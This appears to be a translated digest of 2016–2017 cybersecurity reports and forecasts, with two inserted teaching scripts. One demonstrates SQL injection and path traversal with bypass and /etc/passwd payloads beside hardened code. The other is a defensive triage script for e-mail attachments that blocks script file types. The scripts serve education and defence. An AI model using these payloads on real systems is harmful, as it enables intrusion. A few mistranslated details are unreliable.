The Trend Micro report notes that West African criminal culture has formed a mentality that justifies fraud; some hold that this culture even encourages it, equating fraud with outwitting victims, especially foreigners. The clearest example is "sakawa", a ritualized practice of online fraud in Ghana, whose practitioners believe that a higher power grants fraudsters protection and luck in their activities.
"Mythologized thinking and an air of mystery are characteristic of the hacker milieu, since it deals with secret data and other people's secrets," says Dmitry Gvozdev, CEO of Security Monitor. "And in the case of African hackers, who are often not very skilled and use ready-made tools developed by their European and American colleagues, the appearance of such a cargo cult is not surprising, especially if this information is not a very early April Fools' joke."
Danish MPs afraid to take gadgets on a trip to Russia
In March 2017, it became known that Danish members of parliament would travel to Russia without personal mobile devices and laptops for fear that the electronics would be hacked.
Former Danish Foreign Minister Martin Lidegaard, of the Social Liberal Party, wrote on his Facebook page:
"Goodbye, smartphone. The Foreign Policy Committee recommended that we not take gadgets on the trip to Russia for security reasons."
Social Democrat Nick Haekkerup also lamented on Facebook that he was forced to leave devices such as his iPhone and iPad at home, so he would have to spend a week without the Internet, email and social networks.
The MPs were not left without cellular communications, however: Lidegaard posted a photo of an old Nokia push-button phone that he was allowed to take to Russia. The Danish delegation's plans in Russia were not reported.
Danish ministries were repeatedly hacked in 2015-2016, Reuters reported, citing a report from the Danish Defence Ministry's cybersecurity unit; according to the authorities, foreign state-sponsored hacking groups were behind the attacks. Although the report does not name the country responsible, it notes that Russia and China have extensive cyber espionage capabilities.
The same unit said the threat of cybercrime against local authorities and companies remained "very high". Lidegaard had said earlier that the European Union should prepare for a hybrid war with Russia.
In 2016, US intelligence agencies accused Russia of hacking attacks aimed at boosting the vote for the Republican Donald Trump in the presidential election. Moscow denies the accusations.[40]
Positive Technologies: In 2017, the number of cyber attacks on banks will increase by a third
On January 27, 2017, Positive Technologies published its findings on 2016 information security trends that will shape the future of the industry, based on attack statistics and data from its own implementation projects.
2016
- Data loss is no better than money loss: the result of most computer attacks in 2016 was a leak of sensitive information.
- Targeted attacks: 62% of the year's cyber attacks were targeted, and the main penetration method is spear phishing. Attackers' average dwell time in a system is up to 3 years, and only 10% of attacks are detected by the victims themselves.
- Financial systems: attackers use simple methods and legitimate software as cover, while the attacks themselves are prepared more carefully. A 30% increase in attacks on financial institutions is expected, chiefly because of reactive approaches to information security and a refusal to assess security regularly; hackers, seeing "easy money", replicate successful attacks.
- Ransom at the highest level: large companies are extorted via ransomware Trojans, DDoS attacks and website vulnerabilities. Extortion in which hackers demand a ransom for information about vulnerabilities found in a company's web applications (so-called bug poaching) has already become widespread. These extortion techniques will develop further in 2017.
- Power under attack: among industrial control systems reachable from the Internet, building automation and power management systems lead the way; almost half of the vulnerabilities found in 2016 are high risk.
- Between ICS and the Internet of Things: control automation has reached mass users without the necessary security measures. The IoT situation may come to require regulation of a minimum security level for devices: if manufacturers do not show responsibility themselves, the state will step in with certification and standardization of such products.
- Government sites are the most common target of web attacks; the most popular attacks are SQL injection and path traversal.
- Don't trust satellite navigation: GPS signal spoofing attacks have become accessible to everyone.
- You are controlled by Android: as smartphones become the main "remote control" of modern life, cybercriminals' attention to Android devices continues unabated. The "sphere of influence" of mobile apps is expanding: apps for controlling household appliances or for augmented-reality games give attackers new ways to interfere in their victims' lives.
- Attacks through hardware platform vulnerabilities: legitimate hardware features provided by the manufacturers themselves can be misused. Hardware attacks are dangerous because they are often OS-independent and cannot be promptly prevented.
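The two web attacks the list names as most common against government sites, SQL injection and path traversal, both come from the same defect: user input is spliced into a string that something else (the database engine, the filesystem) then interprets. The block below is an added illustration, not code from the Positive Technologies report; it shows a vulnerable and a hardened form of each against a constructed in-memory SQLite table and an assumed document root of `/srv/app/public`.

```python
"""The two web attacks named above, each shown in a vulnerable and a hardened form.

Added illustration, not code from the Positive Technologies report; the
users table, the document root and the request paths are constructed."""
import os
import sqlite3

# Constructed data: a login table behind a web form.
_db = sqlite3.connect(":memory:", check_same_thread=False)
_db.execute("CREATE TABLE users (name TEXT, password TEXT)")
_db.execute("INSERT INTO users VALUES ('admin', 'correct-horse-battery')")
_db.commit()


def login_vulnerable(user: str, pw: str) -> bool:
    """Builds the SQL by string formatting: a quote in the input rewrites the query."""
    query = f"SELECT 1 FROM users WHERE name = '{user}' AND password = '{pw}'"
    return _db.execute(query).fetchone() is not None


def login_hardened(user: str, pw: str) -> bool:
    """Binds the input as parameters: it is compared as data, never parsed as SQL."""
    query = "SELECT 1 FROM users WHERE name = ? AND password = ?"
    return _db.execute(query, (user, pw)).fetchone() is not None


DOC_ROOT = "/srv/app/public"  # assumed document root of the web application


def serve_path_vulnerable(requested: str) -> str:
    """Joins the request path onto the root; '..' segments walk out of it."""
    return os.path.normpath(os.path.join(DOC_ROOT, requested))


def serve_path_hardened(requested: str) -> str:
    """Resolves the path, then refuses anything that lands outside DOC_ROOT.

    os.path.join discards the root when `requested` is absolute, so an absolute
    request is also caught by the containment check rather than by the join."""
    root = os.path.realpath(DOC_ROOT)
    candidate = os.path.realpath(os.path.join(root, requested))
    if os.path.commonpath([root, candidate]) != root:
        raise PermissionError(f"path escapes document root: {requested!r}")
    return candidate


if __name__ == "__main__":
    # Authentication bypass: the comment marker discards the password check.
    print("vulnerable login:", login_vulnerable("admin' --", "wrong"))   # True
    print("hardened login:  ", login_hardened("admin' --", "wrong"))     # False
    # Traversal: the vulnerable resolver hands back a file outside the root.
    print("vulnerable path: ", serve_path_vulnerable("../../../etc/passwd"))  # /etc/passwd
    try:
        serve_path_hardened("../../../etc/passwd")
    except PermissionError as exc:
        print("hardened path:   rejected,", exc)
```

The hardened login never succeeds with `admin' --` or `' OR '1'='1` because the driver sends the parameters separately from the statement text. The path check compares the resolved candidate against the resolved root with `commonpath` rather than a string prefix, so a sibling directory such as `/srv/app/public-old` is not mistaken for being inside the root.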
The expected growth of attacks on financial systems, government sites and corporations using simple techniques (phishing, legitimate software) calls for modern event monitoring and incident investigation tools (SIEM), attack detection systems based on machine learning (WAF), and greater employee awareness.[41]
The weak security of industrial control systems (ICS), combined with a deteriorating geopolitical situation, may lead in 2017 to more cyber attacks on industrial facilities, especially in the energy sector. Strong passwords and disconnecting ICS components from the Internet reduce the risk, but more serious measures include regular security audits, timely updates of vulnerable software and protective tools tailored to the specifics of a given ICS.
Mobile users are advised to pay more attention to application security and to use settings that restrict access to personal information and potentially dangerous actions.
Attacks on the Internet of Things showed that users are often unable to control the security of new devices themselves. To reduce the risk, IoT vendors or service providers must themselves run dedicated security tests on devices; they can be obliged to do so either by additional rules from state regulators or by self-regulation driven by the threat of reputational loss after major attacks. Experts also predict that in 2017 attackers will widen the range of IoT devices they use, with "smart" household appliances (down to kettles and refrigerators) at risk.
2016
Kaspersky Cybersecurity Index
Kaspersky Lab announced in April 2017 that it had recorded a decrease in the share of Russian users who encounter cyber threats and who neglect computer protection, according to the updated Kaspersky Cybersecurity Index, which the company calculated for the second half of 2016.
The first Kaspersky Cybersecurity Index was published in September 2016 with data for the first half of 2016. The second wave of the user survey on which the index is based allowed Kaspersky Lab not only to update the figures but also to track changes in user behavior.
The index consists of three indicators reflecting respondents' attitude to cyber threats: Unconcerned, the share of users who do not believe they can become victims of cybercriminals; Unprotected, the share of users who have not installed protection on their computers, tablets and smartphones; and Affected, the share of users who have become victims of cybercriminals.
The cybersecurity index for Russia for the second half of 2016 is thus 83%-37%-33% (Unconcerned-Unprotected-Affected). In other words, the vast majority of Russian users (83%) do not believe cyber threats can affect their lives in any way, a figure unchanged since the first half of 2016. More than a third (37%) still neglect security software, slightly fewer than the 39% in the first index. Finally, 33% of Russians surveyed admitted having encountered cyber threats; this indicator changed most noticeably, from 42% in the first half of 2016.
For comparison, the global index is 74%-39%-29%: on average, fewer users worldwide than in Russia are unconcerned about cyber threats or affected by them.
In addition to the information security index itself, other data can also be found on the http://index.kaspersky.com website that reflect the characteristics of user behavior in different countries of the world. For example, statistics indicate that Russian users have begun to communicate noticeably more using instant messengers (86% versus 69% in the first wave), manage their finances through online banking systems (80% versus 56%) and store their personal data in the cloud (51% versus 24%).
The Kaspersky Cybersecurity Index is based on data obtained from thousands of users around the world as part of large-scale research conducted by Kaspersky Lab in conjunction with B2B International. The latest wave of the survey covered 17,377 users in 28 countries around the world, including Russia.
2016 broke the record for the number of cyber threats
On March 1, 2017, Trend Micro Incorporated declared 2016 the year of online extortion: the number of cyber threats reached its highest level on record, and losses to companies reached $1 billion globally.
Trend Micro published its annual cybersecurity report for 2016, entitled 2016 Security Roundup: A Record Year for Enterprise Threats, on March 1, 2017. According to the report, ransomware and business email compromise (BEC) became popular with cybercriminals looking for ways to extort companies online. The number of ransomware families increased by 752%.
Trend Micro and the Zero Day Initiative (ZDI) discovered 765 vulnerabilities, 678 of them through ZDI's bug bounty program.
Compared with 2015, the number of vulnerabilities discovered by Trend Micro and ZDI in Apple products grew by 145%, while the number in Microsoft products fell by 47%. The use of vulnerabilities in exploit kits fell by 71%, partly due to the arrest in June 2016 of members of the hacker group behind the Angler exploit kit.
"As cyber threats constantly evolved and grew more complex, attackers shifted their focus from ordinary users to those who have money, that is, to corporations. In 2016 we saw cybercriminals stealing funds from companies and organizations for financial gain, and we have no hope that this trend will change. The purpose of this study is to raise companies' awareness of the tactics attackers actively use to compromise corporate data, and to help organizations build their defense strategy so as to always stay one step ahead of attackers and resist potential attacks," said Ed Cabrera, head of information security at Trend Micro.
Trend Micro Smart Protection Network technology blocked more than 81 billion threats in 2016, up 56% from 2015. In the second half of 2016, on average, more than 3 thousand attacks per second were blocked against the company's customers. During this period, 75 billion threats were received through e-mail.
Ernst & Young: willingness to defend grows, investment does not
On December 23, 2016, EY reported that world-class companies are ready to resist cyber attacks but invest too little in developing their capabilities against cybercrime and lack plans for dealing with the consequences of such attacks.
These conclusions are based on the results of EY's 2016 information security study "Path to cyber resilience: Sense, resist, react".
1,735 companies from different countries and industries took part in the survey. According to the study, half of respondents (50%) believe they are able to detect carefully prepared cyber attacks, the highest level of confidence since 2013, thanks to investment in threat detection tools that predict the consequences of an attack, continuous monitoring mechanisms, security operations centers (SOC) and active defense mechanisms.
Despite these investments, 86% of respondents admit that their cybersecurity function does not fully meet the organization's needs.
Almost two-thirds (64%) of respondents have no dedicated program for collecting and analyzing cyber threat intelligence, or limit themselves to ad hoc activity in this area. As for vulnerability identification, more than half (55%) lack the technical means and capabilities, or use them irregularly, from case to case. 44% have no security operations center for continuous monitoring of cyber attacks and potential threats.
More than half (57%) of respondents reported cybersecurity incidents at their company. Almost half (48%) consider outdated controls and information security architecture their organization's greatest vulnerability, compared with 34% in 2015.
"Organizations have done a great deal to prepare their defenses against cyber attacks, but cybercriminals are no slower in devising new tricks. Organizations should therefore pay more attention to developing the skills and capabilities to counter cyber attacks. They should also think not only about protection and security but also about resilience to cyber threats, an approach that ensures the organization is prepared for cybersecurity incidents and addresses them fully. Companies should have an action plan for a cyber attack and be ready to quickly eliminate the consequences and restore normal operations. Otherwise they put their customers, employees, suppliers and ultimately their own future at risk," said Paul van Kessel, head of EY's international cybersecurity consulting services.
Respondents are concerned about cybersecurity issues:
- increased risks as a result of the actions of employees committed out of negligence or ignorance (55% compared to 44% in 2015),
- unauthorized access to data (54% compared to 32% in 2015).
The main limitations that prevent the operation of the information security function:
- underfunding (61% compared to 62% in 2015);
- lack or absence of qualified personnel (56% compared to 57% in 2015);
- lack of understanding or support from the organization's management (32% unchanged by 2015).
Despite the interconnected nature of the modern digital ecosystem, the study found:
- 62% of organizations consider it unlikely that they would increase cybersecurity spending after an attack that caused no visible damage to operations;
- 58% consider it unlikely that they would increase cybersecurity spending after a cyber attack on a competitor;
- 68% consider it unlikely that they would increase cybersecurity spending after a cyber attack on a supplier;
- almost half of respondents (48%) would not, in the first week after an attack, inform customers who could be affected, even where the attack clearly led to data compromise;
- 42% of organizations have no agreed engagement strategy or action plan for a serious attack.
Organizations are facing an increasing number of devices connecting to their digital ecosystems. Almost three quarters (73%) of the organizations surveyed are concerned about non-compliance by owners of mobile devices (tablets, smartphones, laptops) with the rules for their use, lack of awareness of users about possible risks and consequences.
Half of respondents (50%) saw the main risk of increasing use of mobile devices in the possibility of their loss.
Internet propaganda among the significant cyber threats of 2017
On December 19, 2016, Trend Micro, publishing its forecast for 2017, placed Internet propaganda among the main cyber threats, without downplaying the impact of Internet of Things vulnerabilities and cyber attacks.
According to the company's experts, as technology develops cybercriminals are moving into new territory in 2017. In 2016, information security experts noted a new round of improvements in cyber attacks and a diversification of their targets.[42]
"We predict the emergence of new methods of attack on large corporations, an expansion of online extortion tactics affecting an ever wider range of devices, and the use of cyber propaganda to manipulate public opinion," said Raimund Genes, chief technology officer at the Japanese company Trend Micro.
As of December 2016, 46% of the world's population gets its news from Internet sources. As this share grows, so does the threat of cyber propaganda: the automated generation of information traffic aimed at Internet users and the appearance of large volumes of fake news on social networks.
Examples of such manipulation are the fake news that appeared on Facebook during the US presidential election: it was on the social network that users learned that Pope Francis supported Donald Trump, and the "news" of the death of an FBI agent who was investigating the Democratic candidate Hillary Clinton. US President Barack Obama noted that this news may have influenced the course of the election.
At the end of November 2016, Facebook announced a plan to combat fake news. Its measures include improving the algorithm that assesses the reliability of news material, better interaction with users who report inaccurate information, and involving third parties and organizations for expert assessment.
Panda Security: 2017 forecast
On December 15, 2016, Panda Security published its forecast of malicious activity for 2017. The coming year's characteristic features: fewer new malware samples, and a higher professional level of attacks.
Cybercrimes
Cybercriminals focus their efforts on attacks that can bring them the largest profits, using the most effective techniques and raising the professional level of their operations so that "making" money becomes faster and easier.
Ransomware
Ransomware will be the focus of information security. It will absorb other, traditional data-theft attacks. Profit is the main motivation of cybercriminals, and ransomware is the easiest and most effective way to get it. One thing will remain unchanged: victims will have to decide whether or not to pay the criminals to recover their data. Panda Security urges them to keep in mind that paying the ransom does not guarantee full recovery of the data.
Companies
The number of attacks against companies will grow, and the attacks themselves will keep improving. Companies have already become a primary target for cybercriminals because the information they hold is more valuable than that held by individuals.
Internet of Things (IoT)
The company sees the Internet of Things (IoT) as another nightmare for information security teams. The technological revolution has connected a multitude of small devices to the network, and each of them can become an entry point through which attackers penetrate corporate networks.
DDoS-attacks
The largest DDoS attacks were carried out in the last months of 2016, the company said. They were launched by botnets of thousands of infected IoT devices (IP cameras, routers, etc.). In 2017, the number of such attacks will increase.
Mobile phones
It is easier for cybercriminals to focus on a single operating system to maximize profit. Android users can expect a difficult and dangerous 12 months.
Cyber wars
The unstable international situation can have severe consequences for cybersecurity. Governments are seeking access to large amounts of information (at a time when encryption is becoming more widespread), and intelligence agencies will be even more interested in obtaining information that could benefit their countries' industries. This global trend could hamper data-sharing initiatives in 2018.
PandaLabs: Cybersecurity. Forecasts for 2017
IBM and Ponemon Institute study: Companies still not ready to withstand cyber attacks
In November 2016, IBM and the Ponemon Institute published the results of a global study of organizations' resilience to cyber attacks, The Cyber Resilient Organization. According to the study, only 32% of IT and security professionals believe their companies have a high level of cyber resilience; in 2015 the figure was 35%. In addition, 66% of the 2016 respondents say their organizations are not ready to recover from cyber attacks[43].
For the second year in a row, the study shows incident response problems to be the main obstacle to organizations' resilience against cybersecurity threats. 75% of respondents said their companies lack a cybersecurity incident response plan (CSIRP). Where such a plan exists, 52% of respondents have not revised or updated it since it was adopted, or no procedure for doing so exists at all. At the same time, 41% of participants noted that the time required to resolve a cyber incident has increased over the past 12 months; 31% said it had decreased.
"Research on enterprise resilience to cybersecurity threats shows that in 2016, organizations around the world are still not ready to respond and neutralize incidents," said John Bruce, head and co-founder of Resilient, an IBM company. "Security leaders can make significant improvements by making incident response a top priority and focusing on planning, preparing and gathering information."
According to respondents, an incident response platform is one of the most effective security technologies for countering cyber attacks, alongside identity and access management and intrusion detection and prevention systems.
The study also identified typical problems that hold back organizations' cybersecurity. A majority of survey participants (66%) believe insufficient planning and low readiness are the main barriers to enterprise resilience against cyber threats. Respondents also point out that the complexity of IT and business processes is growing faster than the ability to prevent, detect and respond to cyber attacks, leaving companies vulnerable. This year, 46% of participants named the growing complexity of IT processes as the main obstacle to reliable protection of business information, up from 36% in the 2015 study. 52% said the complexity of business processes is a significant barrier, compared with 47% in 2015.
Key findings of the study:
Companies are exposed to frequent and successful cyber attacks
- More than half of respondents (53%) have been affected by at least one data breach in the past two years
- 74% of respondents said that over the past year they have faced cyber threats caused by the human factor
- Assessing the past two years, 74% of respondents said they were subjected to numerous hacker attacks, and 64% were repeatedly compromised by phishing
Organizations cannot run continuously and recover quickly from attacks
- 68% believe that their organizations are not able to withstand cyber attacks
- 66% are not sure that their company can effectively recover from the attack
The biggest barrier is a lack of planning and preparation
- Only 25% have an incident response plan in use; 23% have not adopted one at all
- Only 14% of respondents revise incident response plans more than once a year
- 66% call lack of planning the biggest barrier preventing their organization from becoming resistant to cyber attacks
The ability to respond to cyber attacks has not significantly improved
- 48% believe that the resistance to cyberattacks of their organization has decreased (4%) or has not improved (44%) over the past 12 months
- 41% of respondents believe that the time to eliminate a cybersecurity incident has increased or increased significantly, while 31% said that it has decreased or decreased significantly
Check Point noted a 5% increase in cyber attacks and malware
Check Point researchers found that both the number of malware families and the number of attacks increased by 5%. The volume of attacks on businesses in October peaked compared with all previous months of 2016. The number of attacks with the Locky ransomware continues to grow, moving it from third to second place among the most commonly used malware in October. Locky owes its popularity to the constant appearance of new modifications and to a distribution mechanism based mainly on spam mailings. Locky's authors vary the file types used to download the ransomware (doc, xls and wsf files) and make significant structural changes to the spam emails. The ransomware itself is not exceptional, but the cybercriminals invest considerable effort in infecting as many computers as possible. The Zeus banking Trojan is also back in the top 3.
1. ↔ Conficker - Used in 17% of reported attacks. A worm that allows remote code execution and download of malicious software. The infected computer is controlled by a bot that seeks instructions from its command-and-control server.
2. ↑ Locky - Ransomware that appeared in February 2016. It is distributed mainly through spam emails carrying an infected Word or Zip attachment that downloads and installs malware which encrypts the user's files. Registered in 5% of known attacks in October.
3. ↑ Zeus - Also noted in 5% of detected attacks. A Trojan that attacks Windows platforms and is often used to steal banking information by capturing entered credentials (form grabbing) and keylogging.
The number of attacks on Russia fell significantly in October, dropping it from 52nd to 101st place. Attacks on companies in the country used malware such as InstalleRex, Conficker, Kotetaur, Ramnit, Cryptoload, Dorkbot, Cryptowall, Locky, Bancos and Sality. Botswana, Uganda and Zambia were the most attacked countries last month; Uruguay, Argentina and the Dominican Republic recorded the fewest attacks.
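The Locky delivery chain described above (spam with a Word or Zip attachment that drops a script such as .wsf, which in turn downloads the ransomware) is something a mail gateway can triage before a user opens the attachment. The following is an added example, not code from Check Point or from this article. It inspects the attachment name, its magic bytes and the members of any Zip container using only the Python standard library; the extension list beyond doc/xls/wsf, the size and nesting limits, and the sample attachments are all assumptions constructed for illustration.

```python
"""Triage e-mail attachments for Locky-style droppers (added example).
Looks at the file name, magic bytes and Zip members; stdlib only, offline."""
import io
import os
import zipfile

# The page names doc/xls/wsf as Locky carriers; the rest of this list is an
# assumption about other script/executable types that should not arrive by mail.
SCRIPT_EXTENSIONS = {".wsf", ".js", ".jse", ".vbs", ".vbe", ".hta",
                     ".exe", ".scr", ".cmd", ".bat", ".ps1"}
OOXML_EXTENSIONS = {".docx", ".docm", ".xlsx", ".xlsm", ".pptx", ".pptm"}
LEGACY_OFFICE_EXTENSIONS = {".doc", ".xls", ".ppt"}
ARCHIVE_EXTENSIONS = {".zip"}
OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # legacy binary Office container
ZIP_MAGIC = b"PK\x03\x04"                           # Zip and OOXML (docx/docm/...)
MAX_MEMBERS = 50                                    # assumed limits against archive bombs
MAX_MEMBER_BYTES = 5 * 1024 * 1024
MAX_NESTING = 2


def _ext(name):
    return os.path.splitext(name.lower())[1]


def _triage_ooxml(filename, data):
    # OOXML documents are Zip files; VBA macros live in a vbaProject.bin member.
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        if any(n.lower().endswith("vbaproject.bin") for n in zf.namelist()):
            return "block", "macro-enabled Office document: %s" % filename
    return "allow", "Office document without VBA project: %s" % filename


def _triage_archive(filename, data, depth):
    worst = ("allow", "archive contains no risky members: %s" % filename)
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        infos = zf.infolist()
        if len(infos) > MAX_MEMBERS:
            return "review", "archive has %d members: %s" % (len(infos), filename)
        for info in infos:
            if info.file_size > MAX_MEMBER_BYTES:
                return "review", "oversized member %s in %s" % (info.filename, filename)
            verdict, reason = triage_attachment(info.filename, zf.read(info.filename), depth + 1)
            if verdict == "block":
                return "block", "inside %s: %s" % (filename, reason)
            if verdict == "review":
                worst = ("review", "inside %s: %s" % (filename, reason))
    return worst


def triage_attachment(filename, data, depth=0):
    """Return (verdict, reason); verdict is 'block', 'review' or 'allow'."""
    ext = _ext(filename)
    if ext in SCRIPT_EXTENSIONS:            # also catches double extensions like invoice.pdf.js
        return "block", "script or executable attachment: %s" % filename
    is_zip = data.startswith(ZIP_MAGIC)
    is_ole = data.startswith(OLE2_MAGIC)
    try:
        if ext in OOXML_EXTENSIONS:
            if not is_zip:
                return "review", "extension/content mismatch: %s" % filename
            return _triage_ooxml(filename, data)
        if ext in LEGACY_OFFICE_EXTENSIONS or is_ole:
            # The stdlib cannot parse VBA streams in OLE2 files; hand these to a human or a sandbox.
            return "review", "legacy OLE2 Office file may carry macros: %s" % filename
        if ext in ARCHIVE_EXTENSIONS or is_zip:
            if depth >= MAX_NESTING:
                return "block", "archive nested deeper than %d levels: %s" % (MAX_NESTING, filename)
            return _triage_archive(filename, data, depth)
    except zipfile.BadZipFile:
        return "review", "corrupt or unreadable container: %s" % filename
    return "allow", "no risky indicators: %s" % filename


def _zip_bytes(members):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


def build_samples():
    """Constructed attachments imitating a Locky spam wave; none of them is real malware."""
    return {
        "Invoice_8841.zip": _zip_bytes({"Invoice_8841.wsf": b"<job><script language='JScript'></script></job>"}),
        "Payment_details.docm": _zip_bytes({"[Content_Types].xml": b"<Types/>",
                                            "word/document.xml": b"<w:document/>",
                                            "word/vbaProject.bin": b"\x00" * 16}),
        "Agenda.docx": _zip_bytes({"[Content_Types].xml": b"<Types/>", "word/document.xml": b"<w:document/>"}),
        "Scan_0027.doc": OLE2_MAGIC + b"\x00" * 24,
        "report.pdf": b"%PDF-1.4\n1 0 obj<<>>endobj\n%%EOF\n",
        "Invoice.pdf.js": b"var x = new ActiveXObject('MSXML2.XMLHTTP');",
    }


def triage_samples():
    """Verdict per constructed sample, e.g. {'Invoice_8841.zip': 'block', ...}."""
    return {name: triage_attachment(name, data)[0] for name, data in build_samples().items()}


if __name__ == "__main__":
    for name, data in build_samples().items():
        print("%-22s %s" % (name, triage_attachment(name, data)))
```

The "review" verdict exists because the standard library can open Zip-based OOXML files but not the VBA streams of legacy .doc/.xls containers; a production gateway would pass those to a macro parser or a sandbox rather than allow them through, which is exactly how Locky's .doc droppers got in.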
Mobile malware continues to expose businesses to significant danger: 15 out of 200 types of malware attack mobile devices. Also for the past seven months, HummingBad, the Android malware, has remained the most used for attacks on mobile devices. The three most commonly used types of mobile threats in October are:
1. ↔ HummingBad - Android malware that uses a rootkit which survives reboots to install fraudulent applications and, with minor modifications, can carry out additional malicious activity, including installing software keyloggers, stealing credentials and bypassing the encrypted email containers used by companies.
2. ↔ Triada - Modular backdoor for Android, which gives increased privileges to downloaded malware, as it helps them infiltrate system processes. Triada was also seen spoofing URLs loaded in the browser.
3. ↑ XcodeGhost - A compromised version of the iOS developer platform Xcode. This unofficial build of Xcode was modified to inject malicious code into any application designed and compiled with it. The embedded code sends information about the application to a command-and-control server and lets the infected application read data from the device clipboard.
"The fact that the top 10 malware has remained unchanged since September suggests that cybercriminals are satisfied with their results. For companies it is a signal that they need to act proactively to protect their critical business assets. The effectiveness of programs such as Conficker also shows that companies are not yet using the necessary level of protection," comments Vasily Diaghilev, head of Check Point Software Technologies. "To protect themselves, businesses need a comprehensive approach and advanced protection of networks, endpoints and mobile devices that stops malware before infection. This is possible with solutions such as Check Point's SandBlast™ Zero-Day Protection and Mobile Threat Prevention, which are capable of countering the latest threats."
Fortinet on cybersecurity trends
Fortinet released six forecasts prepared by FortiGuard Labs threat researchers on how threats will develop in 2017. The forecasts highlight the strategies and methods that Fortinet's researchers believe cybercriminals will use in the near future, and describe the scale of the potential damage cyber attacks could do to the global digital economy.
1. From smart to even smarter: automated and human-like attacks will require smarter security systems
Threats are becoming more sophisticated and autonomous. Next year, malware with human-like behavior is expected to appear, capable of adapting and learning from its successful actions. This will make attacks more effective and more damaging.
2. IoT device manufacturers will be responsible for security violations
If IoT device manufacturers fail to secure their products, they will lose customers whose interest wanes over security concerns, and this would significantly change the global digital market. Consumers, suppliers and other groups will push much harder for the development and adoption of security standards under which device manufacturers can be held accountable for the damage their products cause.
3. 20 billion IoT devices are the weak link in cloud infrastructure
The weakest link in cloud security is not its architecture but the millions of remote devices that access cloud resources. Tools built specifically to attack end devices are expected to appear, leading to client-side attacks that can easily punch holes in cloud providers' defenses. More organizations will adopt segmentation-based security strategies that let them create, configure and enforce uniform security policies across physical, virtual and private cloud environments, from IoT to the cloud.
4. As a result of attacks, the situation in "smart cities" will begin to heat up
Next year, attackers will target rapidly evolving building automation and control systems. If any of these integrated systems of particular interest to cybercriminals come under attack, it can lead to serious violations in the service of citizens.
5. Ransomware is just the beginning
Cybercriminals are expected to carry out targeted attacks on celebrities, politicians and large organizations. Automated ransomware attacks will let attackers take advantage of economies of scale, extorting many victims simultaneously, each for a small amount. IoT devices will be the most frequent targets.
6. It will be necessary to compensate for the critical shortage of qualified personnel in the field of security by introducing new technologies
Because of the current shortage of information security specialists, many organizations and countries wishing to enter the global digital market will be in significant danger. Their staff lack the experience and training needed for tasks such as developing a security policy, protecting important assets that move freely between network environments, or identifying and responding to modern advanced attacks.
Predicted threat trends and conclusions
The Internet of Things (IoT) and cloud technology still feature prominently in forecasts, but over time some trends have emerged. The Internet activity of both organizations and individuals has increased significantly, which expands the potential attack surface. Moreover, anything can become a target, and in the same way any tool can become a weapon. Threats are becoming more sophisticated, can operate autonomously, and are increasingly hard to identify. And the latest trend: old threats are returning, improved with new technologies, which opens new horizons for threat detection and analysis.
3.2 million PCs are vulnerable, only 2,100 have protection
In October 2016, Talos (the Cisco division that researches and analyzes information security threats) described how cybercriminals have adapted traditional criminal methods to the digital era.
Cybercrime has become a large-scale problem of humanity, it affects users, companies, states. The actions of hackers can lead to material damage and paralyze the work of corporations, banks, government services and systems.
Martin Lee, Head of Engineering at Talos:
The attackers' models are not new. They use traditional schemes, adapting them to the realities of the digital age.
The classic model of criminal activity, kidnapping for ransom, has become widespread among cyber fraudsters. Where gangsters used to be limited to the territory they worked in, cybercriminals know no boundaries. The first case of a digital abduction with a ransom demand was recorded in 1989 in Thailand: the fraudster sent emails to medical institutions demanding that money for the stolen data be transferred to an address in Panama. This type of extortion lasted 16 years.
In 2005, GPCoder appeared. With programs of this kind, criminals encrypt the files on an infected device and demand money from the user for decryption. Writing encryption software is a very complex process, so attackers often use fakes. Having paid, the user may not get the stolen documents back, since they have most likely already been deleted. Criminals still use this type of extortion, only with improved encryption methods.
The next stage in the evolution of DDoS attacks began in March 2016, when we encountered the activities of the SamSam gang. This group penetrates an organization's servers, reaches the key data needed for daily operations, encrypts it and demands a ransom. The hacked company is strongly tempted to pay, as these files are essential to its everyday work.
Cybercrime has become a business. Attackers run their operations like commercial companies: they seek to cut costs, maximize profit and enter new markets, and they calculate their gains carefully. The ransom is set slightly below the value of the stolen documents to the company, while still covering the cost of the criminal operation. Attackers use the same high-tech tools as commercial companies. Large players in this black market are served by service providers, and an ecosystem of individual specialists and criminal groups carrying out DDoS attacks has formed.
"It must be remembered that if you have something of value, there will certainly be a fraudster who will try to steal it. According to our data, 3.2 million computers and systems in the world are vulnerable to hacker attacks, and only 2,100 of them have the necessary protection tools installed," said Martin Lee.
Europol named eight major cybercrime trends
- Crime-as-a-service: the "digital underground" is underpinned by an increasingly popular and in-demand crime-as-a-service model that links specialized suppliers of hacking tools with organized criminal groups. Terrorists have obvious potential to gain access to this sector in the near future.
- Ransomware: ransomware and banking Trojans remain the top malware threats, and this is unlikely to change in the foreseeable future.
- Criminal use of data: data remains a key commodity for cybercriminals. In many cases it is used for immediate financial gain, but increasingly it is used for more complex fraud schemes, encrypted for ransom, or used directly for extortion.
- Payment fraud: EMV (chip and PIN), geo-blocking and other industry security measures continue to help in the fight against card fraud, yet the number of attacks on ATMs keeps growing. Organized crime groups are starting to compromise payments made with contactless (NFC) cards.
- Online child sexual abuse: the use of end-to-end encrypted platforms to share media files, together with anonymous payment systems, is fuelling the growth of live streaming of child abuse.
- Abuse of the Darknet: the Darknet continues to support criminals involved in a range of illegal activities, such as sharing child sexual abuse material. The extent to which extremist groups use cyber tools to carry out attacks is currently limited, but the supply of hacking tools and services, as well as illegal goods, on the Darknet could change that quickly.
- Social engineering: law enforcement agencies have registered an increase in phishing attacks on high-value targets. The main threat is attacks targeting the CEOs of enterprises and organizations (CEO fraud).
- Virtual currencies: Bitcoin remains the currency fraudsters prefer for buying illegal goods and services on the Darknet. Bitcoin has also become the standard payment method for ransom demands and other forms of extortion.
The volume, scale and cost of cybercrime keep growing and have recently reached unprecedented levels. Some EU member states report that cybercrime cases may already outnumber traditional crimes[44][45].
The increase in the number of fraudsters, together with the increase in the number of opportunities to participate in highly profitable illegal activities, partially fuels this trend, as well as the emergence of new tools for committing cybercrime in areas such as mobile malware and fraud directed against ATMs. Nevertheless, the main part of the problem is insufficient compliance with digital security standards by legal entities and individuals.
A significant part of cybercrime activity still uses relatively old technologies, security for which is available, but not widespread.
9x increase in unknown malware in a decade
